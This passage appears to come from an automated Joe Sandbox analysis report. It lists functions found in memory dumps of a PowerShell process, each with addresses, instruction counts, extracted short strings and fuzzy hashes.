                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$x.k$x.k$-k
                                                                                                        • API String ID: 0-2818152863
                                                                                                        • Opcode ID: 1779e50e6796434201875b85b7989a1e6d1df571219659e6190490b9ce1dcafd
                                                                                                        • Instruction ID: afc566ed09842bb7295306271e457e776a492d6b724614cbd73167ad7c7b01d7
                                                                                                        • Opcode Fuzzy Hash: 1779e50e6796434201875b85b7989a1e6d1df571219659e6190490b9ce1dcafd
                                                                                                        • Instruction Fuzzy Hash: 3CF1E4B4B002149FD724DB68C951B6EBBB3EF94304F1184A9E6096F385CB75DD818F92
                                                                                                        Function 079380D8 Relevance: 6.5, Strings: 5, Instructions: 291COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$4'eq$x.k$-k
                                                                                                        • API String ID: 0-1762392609
                                                                                                        • Opcode ID: 6c41b826e2233965e23b82a32da040a44376f741f65a77d4fda1c55f7b89de7b
                                                                                                        • Instruction ID: ba76241d3f9a9e9e620e81b06365b4074b1e13d512ad2216862d1492f575600c
                                                                                                        • Opcode Fuzzy Hash: 6c41b826e2233965e23b82a32da040a44376f741f65a77d4fda1c55f7b89de7b
                                                                                                        • Instruction Fuzzy Hash: 17C1AEB4A00204DFCB15CB64C555FAEBBB2AF88308F15C459E5016F386CB79EC45CBA2
                                                                                                        Function 07938170 Relevance: 6.5, Strings: 5, Instructions: 225COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$4'eq$x.k$-k
                                                                                                        • API String ID: 0-1762392609
                                                                                                        • Opcode ID: ef8e0fa7e5baa602680fd579c536fecab2f4a4f7e067707b54adcd78f5a5aa77
                                                                                                        • Instruction ID: 2abd58e16525e42089f7d0696b611c522927d72052641e4a301e7aa1df23ef82
                                                                                                        • Opcode Fuzzy Hash: ef8e0fa7e5baa602680fd579c536fecab2f4a4f7e067707b54adcd78f5a5aa77
                                                                                                        • Instruction Fuzzy Hash: 8291ACB4A00205DFCB14CB54C555FAEBBB2EF94348F158459E9012F386CB79EC46CBA2
                                                                                                        Function 04B3B830 Relevance: 4.2, Strings: 3, Instructions: 459COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hiq$$eq$$eq
                                                                                                        • API String ID: 0-2852621797
                                                                                                        • Opcode ID: afaee45fac2f451f52cdff5cb490c19e6718560b62ef02b2a977aecbd4f0f646
                                                                                                        • Instruction ID: a213e0704aba0d995c6be496dd8c7c27b7b173fef4f76978fc8cb043537377a7
                                                                                                        • Opcode Fuzzy Hash: afaee45fac2f451f52cdff5cb490c19e6718560b62ef02b2a977aecbd4f0f646
                                                                                                        • Instruction Fuzzy Hash: 85125234B006188FCB25EB69D8546AEBBB2FF89305F1544E9D40AAB355DF35AD81CF80
                                                                                                        Function 07937080 Relevance: 3.5, Strings: 2, Instructions: 982COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq
                                                                                                        • API String ID: 0-907361030
                                                                                                        • Opcode ID: 30de341972d00d51b5b7831474f20fb35a1d6a2f969b6dd7394103f9fca0ae0b
                                                                                                        • Instruction ID: 47e0f2ea38795918bf566899cb6916ef8ff57c835b2a36271a5939d462f7ff30
                                                                                                        • Opcode Fuzzy Hash: 30de341972d00d51b5b7831474f20fb35a1d6a2f969b6dd7394103f9fca0ae0b
                                                                                                        • Instruction Fuzzy Hash: A4924CF4B002159FD724CB58C985B6ABBB2BF89308F10C5A9D9096B741CB75ED81CF92
                                                                                                        Function 0793885B Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq
                                                                                                        • API String ID: 0-907361030
                                                                                                        • Opcode ID: 8f4147ea0945f0a396e29aeea0c430881e00d0ac9e03c886de7b7757ea47b557
                                                                                                        • Instruction ID: 9f4896bf11e14169b625f5d457cdc7ffb06b06a99bd9ac5139e18b1acad628af
                                                                                                        • Opcode Fuzzy Hash: 8f4147ea0945f0a396e29aeea0c430881e00d0ac9e03c886de7b7757ea47b557
                                                                                                        • Instruction Fuzzy Hash: AF5155F17042068FCF648B788455E7BBBA6AF9220CB1484A9F112CB396DB35D941C373
                                                                                                        Function 0793910E Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq
                                                                                                        • API String ID: 0-907361030
                                                                                                        • Opcode ID: 1c2bf6f42c8d4c7403b54a45f91d59e2121f4bc99e6d7df977ffd5f350f5e904
                                                                                                        • Instruction ID: 03f48cadc47827d2c99021dab8a5111bc1291c3f95c5837a96cb60e5aaaebad7
                                                                                                        • Opcode Fuzzy Hash: 1c2bf6f42c8d4c7403b54a45f91d59e2121f4bc99e6d7df977ffd5f350f5e904
                                                                                                        • Instruction Fuzzy Hash: F441AEF1B04241CFCF2197B8585577BBB969FD222CB1444AED6428B386DBB1D801C7A2
                                                                                                        Function 07937064 Relevance: 2.1, Strings: 1, Instructions: 814COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq
                                                                                                        • API String ID: 0-1552367303
                                                                                                        • Opcode ID: a002c7d493b418db798b548e7bab570c5c940aee57fbf715dacbedbfae03e94d
                                                                                                        • Instruction ID: 24642d22a53090f19afe00f011b6d2fc0b3549a212c6cba546782458f6670078
                                                                                                        • Opcode Fuzzy Hash: a002c7d493b418db798b548e7bab570c5c940aee57fbf715dacbedbfae03e94d
                                                                                                        • Instruction Fuzzy Hash: 83724BF4B002159FD724CB54C981B6ABBB2BF89318F10C5A9D9096B741CB76ED81CF92
                                                                                                        Function 07937CFC Relevance: 1.8, Strings: 1, Instructions: 533COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq
                                                                                                        • API String ID: 0-1552367303
                                                                                                        • Opcode ID: d9f39cc386ce4a93d87c2b027bd9c4eaafc6b1a4454797d5a13312604e778664
                                                                                                        • Instruction ID: dce03ffce97617032974da3e51d7f297bbd0bc44177296bd20483955096c337c
                                                                                                        • Opcode Fuzzy Hash: d9f39cc386ce4a93d87c2b027bd9c4eaafc6b1a4454797d5a13312604e778664
                                                                                                        • Instruction Fuzzy Hash: 10325BF4B00215DFD7248B54C981B69B7B2BF85318F14C5A9EA0A6B341CB76ED81CF92
                                                                                                        Function 079369F8 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x.k
                                                                                                        • API String ID: 0-3537041944
                                                                                                        • Opcode ID: 293bc5a3f2c19fd5679126600851d1cfbb711f22ec7532d71204b04edbadd618
                                                                                                        • Instruction ID: 5f6b19f4033b7e18e50a16b4e7d65f859d837fc876b181fb067b3588d5d96de8
                                                                                                        • Opcode Fuzzy Hash: 293bc5a3f2c19fd5679126600851d1cfbb711f22ec7532d71204b04edbadd618
                                                                                                        • Instruction Fuzzy Hash: 1E919DB0B00200AFD714DB64C545BAEBBB2AF89308F108469E6056F391CB76EC45CFA2
                                                                                                        Function 07936AB7 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x.k
                                                                                                        • API String ID: 0-3537041944
                                                                                                        • Opcode ID: 53753bfede225eac8dc022d6f31ed634ef6dc9097166a452672cf4689b640623
                                                                                                        • Instruction ID: 9874b4abba082ad4e63f117d3a9bcd07237395ed4985aad9c4814ff2a98d5bdf
                                                                                                        • Opcode Fuzzy Hash: 53753bfede225eac8dc022d6f31ed634ef6dc9097166a452672cf4689b640623
                                                                                                        • Instruction Fuzzy Hash: 0B71B3B0B00204EBD718DB64C556B6EBBB3EF95308F108469E6056F785CB76EC45CB92
                                                                                                        Function 04B39933 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: l
                                                                                                        • API String ID: 0-2517025534
                                                                                                        • Opcode ID: a880c4ff66ebda043e500de338f4bbe225852f967a2e4031b409b62e1dea77de
                                                                                                        • Instruction ID: acf4719de3cca08f39366439634c16a40bfb22398eed9888006cffc956aa34ee
                                                                                                        • Opcode Fuzzy Hash: a880c4ff66ebda043e500de338f4bbe225852f967a2e4031b409b62e1dea77de
                                                                                                        • Instruction Fuzzy Hash: 68419C70A00204DFCB28DFA9C8846ADBBF2FF84301F158569D016AB795DBB0AC45CB80
                                                                                                        Function 07938526 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x.k
                                                                                                        • API String ID: 0-3537041944
                                                                                                        • Opcode ID: be4a54f28eadb10ff16725779bd01189d1e41aec2c16fb76c6d906900ce62b5c
                                                                                                        • Instruction ID: 47dfe694a8af934ba08b88157c6d7e2fdb5ccb63eea8dfa9ebaf85d9b358d7bb
                                                                                                        • Opcode Fuzzy Hash: be4a54f28eadb10ff16725779bd01189d1e41aec2c16fb76c6d906900ce62b5c
                                                                                                        • Instruction Fuzzy Hash: 8431A5B4B002049BD7189764C955FAE7B63EF94348F10C428EA016F395CFB99C45CBA2
                                                                                                        Function 04B32F50 Relevance: .5, Instructions: 502COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 836c7f0d614bbd90c1ea93d90fef612e30484aeadf099134cae79a7af05ba952
                                                                                                        • Instruction ID: 664328728129e753e43bda38c607af61c00256eee03c99fda95f3b6e21f0ef36
                                                                                                        • Opcode Fuzzy Hash: 836c7f0d614bbd90c1ea93d90fef612e30484aeadf099134cae79a7af05ba952
                                                                                                        • Instruction Fuzzy Hash: 32221774A012499FCB05CF99C494AAEFBF2FF88311F258599E815AB365C735EC81CB90
                                                                                                        Function 04B34AA8 Relevance: .3, Instructions: 330COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8f07425f19486e369f98b6d9c2c84c7560d93030ed7d0b1472bddfa9bf35fee9
                                                                                                        • Instruction ID: 9f1b255291219bbfa99fc09d450dfe2b90cbe51e72af0335c90b92a32bc31124
                                                                                                        • Opcode Fuzzy Hash: 8f07425f19486e369f98b6d9c2c84c7560d93030ed7d0b1472bddfa9bf35fee9
                                                                                                        • Instruction Fuzzy Hash: ABD16D74A00218EFCB05CF99D584A9DFBB2FF88311F248599E805AB361D731ED82CB90
                                                                                                        Function 04B39180 Relevance: .3, Instructions: 322COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0479e4f23ab422152912ecb3c252150590528e530aec3802948109e211e30c36
                                                                                                        • Instruction ID: f6092de5d6fdf3e32e99f778d0deb4845e844c2a44641298254cd926fa0f05ff
                                                                                                        • Opcode Fuzzy Hash: 0479e4f23ab422152912ecb3c252150590528e530aec3802948109e211e30c36
                                                                                                        • Instruction Fuzzy Hash: D3C1C1B5A00208DFDB24DFA9D844AADBBB2FF85311F118598E406AF365CB75EC49CB40
                                                                                                        Function 04B339B0 Relevance: .3, Instructions: 317COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 37b75e7a9d752663cbf54833bdc6a7afac8864e9abb8690896c607163ea861d5
                                                                                                        • Instruction ID: 28e1a1a0e8c846dde957607a1707e2c8c9a04056fc7eaa669c5e22bbc7f0ee80
                                                                                                        • Opcode Fuzzy Hash: 37b75e7a9d752663cbf54833bdc6a7afac8864e9abb8690896c607163ea861d5
                                                                                                        • Instruction Fuzzy Hash: 18D10774A01219DFCB14CF99D584A9EBBF2FF88311F248199E805AB365C775EC82CB90
                                                                                                        Function 04B3F31C Relevance: .3, Instructions: 279COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2d14d6f4f47fdce1156ecb3a72c7944ebd09370e3e531d98b71fac1864cece4a
                                                                                                        • Instruction ID: 54f32c23d81cacef4a8382830bc1d8918522d9384a2aa61866aaf94d754a37ad
                                                                                                        • Opcode Fuzzy Hash: 2d14d6f4f47fdce1156ecb3a72c7944ebd09370e3e531d98b71fac1864cece4a
                                                                                                        • Instruction Fuzzy Hash: 1CB16C70E00209DFDF10CFAAC9857ADBBF2EF88315F148169E815A7264EB74A845CF91
                                                                                                        Function 04B3FBF2 Relevance: .3, Instructions: 259COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 54e9c3759a09925cec1cbbf7250e9967a565246d64d6007e051369060872b530
                                                                                                        • Instruction ID: 42cd96645e540dbad8dfa336dc4fd25791e731dab690f9560169e6e381ec0b89
                                                                                                        • Opcode Fuzzy Hash: 54e9c3759a09925cec1cbbf7250e9967a565246d64d6007e051369060872b530
                                                                                                        • Instruction Fuzzy Hash: 9CA17E70E0020ADFDF10CFAAC9857ADBBF1EF48715F248569E814E7294EB34A845DB81
                                                                                                        Function 04B389E8 Relevance: .2, Instructions: 208COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b42c0a0f0792a3b6ac97ab6ea6a2be824f0fa66db273e558d68cff1ce8fe53f7
                                                                                                        • Instruction ID: d8a54f54bc19923a44fa6c65e879ad435951cc4150bf48a209d832c5a7f666f8
                                                                                                        • Opcode Fuzzy Hash: b42c0a0f0792a3b6ac97ab6ea6a2be824f0fa66db273e558d68cff1ce8fe53f7
                                                                                                        • Instruction Fuzzy Hash: 02819D30A05244DFCB15DF65C8849AEBBF2FF89311F1884A9E445AB362D735EC85CB51
                                                                                                        Function 04B39948 Relevance: .2, Instructions: 192COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 56c9ff333ef182dc37f3d4ab3e35692a3d2bb081cadfc5e765fe8424c65e0738
                                                                                                        • Instruction ID: e43874879a5869d6f2a5beb80d334b6af5c1940540c8aa46fff63d44961050e9
                                                                                                        • Opcode Fuzzy Hash: 56c9ff333ef182dc37f3d4ab3e35692a3d2bb081cadfc5e765fe8424c65e0738
                                                                                                        • Instruction Fuzzy Hash: A471AD70A00209DFCB24DF69D884AADBBF2FF84311F15C5A9E419DB695DB71AC46CB80
                                                                                                        Function 04B39AB6 Relevance: .2, Instructions: 188COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 645733e4846fef4146cd21fcab3eb54a114eb989269c1d7c7fc984aafb13eaac
                                                                                                        • Instruction ID: bed9b44def9e73496b884eef45e538000405d71bb89068d1837f933828083bec
                                                                                                        • Opcode Fuzzy Hash: 645733e4846fef4146cd21fcab3eb54a114eb989269c1d7c7fc984aafb13eaac
                                                                                                        • Instruction Fuzzy Hash: 6B714D70A00208DFDF24DFB5D584AADBBF2FF88305F558569E412AB290DB75AD46CB40
                                                                                                        Function 04B3F965 Relevance: .2, Instructions: 181COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3c4e55ed4adbb872c8f035e403b59ae89ac99bf569c8e8ad74d82d68bdeb35e0
                                                                                                        • Instruction ID: 20c53441d8f7cedb44670c9f42c50e2d0f42fd8884103a8e1b342575e4b13bc2
                                                                                                        • Opcode Fuzzy Hash: 3c4e55ed4adbb872c8f035e403b59ae89ac99bf569c8e8ad74d82d68bdeb35e0
                                                                                                        • Instruction Fuzzy Hash: 70715DB1E00209DFDF10CFAAC9857EEBBF1EF88315F148169E415A7254EB74A846CB91
                                                                                                        Function 04B3F970 Relevance: .2, Instructions: 180COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6325771f09334395a8b07f17cf792d4112360bfae7f372e02e53a56b6f605451
                                                                                                        • Instruction ID: 67b68040d671939d08e4b31648e5b6bd76604ec8d9f790708e5c079270c39ab1
                                                                                                        • Opcode Fuzzy Hash: 6325771f09334395a8b07f17cf792d4112360bfae7f372e02e53a56b6f605451
                                                                                                        • Instruction Fuzzy Hash: A87151B1E002099FDF10CFAAC9817AEBBF2EF88315F148569D415A7254EB74A846CF91
                                                                                                        Function 04B33061 Relevance: .1, Instructions: 107COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3fd465d50847716e4263934ef0f6f7e74bf2a281f61d02c41d971009baf66931
                                                                                                        • Instruction ID: e0e187074221eff5f2640948ccf55b218ebc6d0c6744967714f82b1981428caa
                                                                                                        • Opcode Fuzzy Hash: 3fd465d50847716e4263934ef0f6f7e74bf2a281f61d02c41d971009baf66931
                                                                                                        • Instruction Fuzzy Hash: 6A413874A005059FCB05CF99C4D49AEFBB1FF48310B2586A9D846AB364C736FC64CBA0
                                                                                                        Function 07930EF8 Relevance: .1, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0c6eda531958be0cdfb1146094c53d7821ff54b405f2c004c64302bd7d04cd57
                                                                                                        • Instruction ID: e40f952ffce1558967e963c7c83cf51729e80ca6655ab4f01806685b48b1024b
                                                                                                        • Opcode Fuzzy Hash: 0c6eda531958be0cdfb1146094c53d7821ff54b405f2c004c64302bd7d04cd57
                                                                                                        • Instruction Fuzzy Hash: 102170B13003069BD7645ABE448273BBADB9BC5319F24843AA506CB3C5DD76D840C361
                                                                                                        Function 04B3C4E8 Relevance: .1, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8e907a4a555ea4456d81cf91a9b9232fac06811618c9fe28e90eec3127646c2f
                                                                                                        • Instruction ID: aeaa51dbe18790038139e214017f3b5f7bd5031df14ee357a9747363e538fbc5
                                                                                                        • Opcode Fuzzy Hash: 8e907a4a555ea4456d81cf91a9b9232fac06811618c9fe28e90eec3127646c2f
                                                                                                        • Instruction Fuzzy Hash: 70317231B011688FCB25DB68C8446EEB7B2BF49305F1544E9D40AAB351DF35AE81DF81
                                                                                                        Function 04B33907 Relevance: .1, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8951027de614675a62fa5a522c729dfd70b57382176f052de188ed63dcf73099
                                                                                                        • Instruction ID: d9c0f1f64ad79d44fa2a983cf5f1a46287df03e077a7b337dc090331914f6114
                                                                                                        • Opcode Fuzzy Hash: 8951027de614675a62fa5a522c729dfd70b57382176f052de188ed63dcf73099
                                                                                                        • Instruction Fuzzy Hash: 6E317EB4A08649DFCB01CF99C4909AABFF1FF49310B15819AD949DB762C735EC41CBA1
                                                                                                        Function 07930EE3 Relevance: .1, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 21dec6db7d888889d2f56b2e0b0e2619a8e8d4c523226e71a4645b425823dd9a
                                                                                                        • Instruction ID: 58efc4e5046041d33e5824c2ce57e4df1c91e80f05f024c28640eb5ec5aefa23
                                                                                                        • Opcode Fuzzy Hash: 21dec6db7d888889d2f56b2e0b0e2619a8e8d4c523226e71a4645b425823dd9a
                                                                                                        • Instruction Fuzzy Hash: 5321E2F2304342AFD7640A7D48827377FEB5F81318F24856AA515CB2D6C979D944C330
